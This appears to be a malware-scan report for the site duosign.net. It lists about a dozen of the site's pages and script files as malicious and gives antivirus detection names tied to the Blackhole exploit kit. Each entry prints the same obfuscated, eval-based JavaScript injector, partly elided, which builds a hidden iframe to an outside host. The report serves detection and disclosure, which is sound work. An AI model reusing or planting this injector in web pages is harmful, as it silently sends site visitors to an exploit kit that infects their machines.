Request | Server response | Status |
http://duosign.net/ | 200 OK Content-Length: 29126 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery-1.7.1.min.js | 200 OK Content-Length: 98693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/forms.js | 200 OK Content-Length: 10453 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery-ui-1.8.16.custom.min.js | 200 OK Content-Length: 24126 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/all-in-one-min.js | 200 OK Content-Length: 4823 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/setup.js | 200 OK Content-Length: 8829 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery.flexslider-min.js | 200 OK Content-Length: 16177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/index.php | 200 OK Content-Length: 29126 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/psd-to-html.php | 200 OK Content-Length: 42395 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery-1.7.2.min.js | 200 OK Content-Length: 98693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/quote.js | 200 OK Content-Length: 11750 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/quote2.js | 200 OK Content-Length: 10349 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/portfolio.php | 200 OK Content-Length: 21900 Content-Type: text/html | malicious |
